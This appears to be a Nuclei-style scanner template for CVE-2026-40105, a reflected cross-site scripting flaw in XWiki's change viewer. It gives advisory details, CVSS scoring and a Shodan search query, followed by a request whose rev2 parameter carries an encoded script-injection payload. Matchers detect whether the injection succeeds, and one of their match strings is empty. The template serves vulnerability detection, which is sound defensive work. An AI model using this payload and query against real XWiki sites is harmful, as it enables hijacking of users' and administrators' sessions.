id: CVE-2026-40105 info: name: XWiki - Cross-Site Scripting author: ritikchaddha severity: medium description: | XWiki is vulnerable to reflected Cross-Site Scripting (XSS) via the `viewer=changes` endpoint. The `rev2` parameter is not properly sanitised before being rendered in the response, allowing an attacker to inject arbitrary JavaScript. Affects XWiki versions prior to the patched release. impact: | Attackers can execute JavaScript in users' browsers, potentially compromising admin accounts and the entire XWiki instance. remediation: | Update to a version later than 17.10.0 or apply the patch to templates/changesdoc.vm manually. reference: - https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-w4fj-87j5-f25c - https://nvd.nist.gov/vuln/detail/CVE-2026-40105 - https://jira.xwiki.org/browse/XWIKI-22481 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2026-40105 epss-score: 0.00737 epss-percentile: 0.73163 cwe-id: CWE-79 metadata: verified: true max-request: 2 vendor: xwiki product: xwiki-platform shodan-query: http.title:"XWiki" tags: cve,cve2026,xwiki,xss http: - method: GET path: - "{{BaseURL}}/bin/view/Sandbox/?viewer=changes&rev1=9.1&rev2=xar%3Aorg.xwiki.platform%3Axwiki-platform-distribution-flavor-common%2F17.6.0q1che%27%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Evfu80q44msz&form_token=test&language=en" matchers-condition: and matchers: - type: word part: body words: - "" - "

Changes for page" - "From version" condition: and - type: word part: header words: - "text/html" - type: status status: - 200 # digest: 4a0a00473045022100caa7c69f1547ad277917750ced534c56da90fc21eb84efe76b276cb95dcffefd02201e2b7e264c2c2575c08c0437f1293dc4f694197089203fbd2e74c36de4f541a6:922c64590222798bb761d5b6d8e72950